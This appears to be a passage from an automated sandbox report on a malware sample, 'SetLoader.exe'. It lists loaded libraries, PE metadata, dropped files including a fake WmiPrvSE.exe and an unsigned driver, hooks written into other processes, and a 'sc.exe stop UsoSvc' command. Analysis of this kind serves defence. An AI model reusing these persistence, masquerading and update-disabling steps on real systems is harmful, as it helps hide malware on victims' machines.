              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeSection loaded: ntmarta.dll
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\choice.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\SetLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: SetLoader.exeStatic file information: File size 15458400 > 1048576
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: SetLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: SetLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SetLoader.exe, SetLoader.exe, 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp, SetLoader.exe, 00000000.00000000.1696717128.0000000000646000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbern.default source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831r source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: SetLoader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: SetLoader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: SetLoader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: SetLoader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: SetLoader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: initial sampleStatic PE information: section where entry point is pointing to: .&T7
              Source: C:\Users\user\Desktop\SetLoader.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4045156Jump to behavior
              Source: SetLoader.exeStatic PE information: section name: .didat
              Source: w1.exe.0.drStatic PE information: section name: .didata
              Source: HealthTool.exe.5.drStatic PE information: section name: .00cfg
              Source: HealthTool.exe.5.drStatic PE information: section name: .2}k
              Source: HealthTool.exe.5.drStatic PE information: section name: .Zj[
              Source: HealthTool.exe.5.drStatic PE information: section name: .&T7
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .oU[
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .G&p
              Source: WmiPrvSE.exe.41.drStatic PE information: section name: .>n>
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063125A push ecx; ret 0_2_0063126D
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0064B45D push esi; ret 0_2_0064B466
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0064BA78 push eax; retn 0064h0_2_0064BA85
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_00631DB0 push ecx; ret 0_2_00631DC3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03477721 push edi; iretd 4_2_03477722
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_034753E8 push ebx; ret 4_2_034753F0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeCode function: 4_2_03471832 push edx; retf 4_2_03471833
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeCode function: 41_2_000000014027AA32 push rax; ret 41_2_000000014027A9AD
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeCode function: 41_2_000000014027AA32 push rbx; iretw 41_2_000000014027A9DF
              Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000000140001394 push qword ptr [0000000140008004h]; ret 67_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile created: C:\Windows\TEMP\kzezoxxlsgop.sys
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile created: C:\Windows\Temp\kzezoxxlsgop.sysJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile created: C:\ProgramData\PcHealthTool\HealthTool.exeJump to dropped file
              Source: C:\Users\user\Desktop\SetLoader.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile created: C:\ProgramData\PcHealthTool\HealthTool.exeJump to dropped file
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeFile created: C:\Windows\Temp\kzezoxxlsgop.sysJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Overwrites code with unconditional jumps - possibly settings hooks in foreign process
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeMemory written: PID: 6104 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeMemory written: PID: 6104 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeMemory written: PID: 5328 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exeMemory written: PID: 5328 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeMemory written: PID: 5628 base: 7FFE22370008 value: E9 EB D9 E9 FF
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeMemory written: PID: 5628 base: 7FFE2220D9F0 value: E9 20 26 16 00
              Source: C:\Users\user\Desktop\SetLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
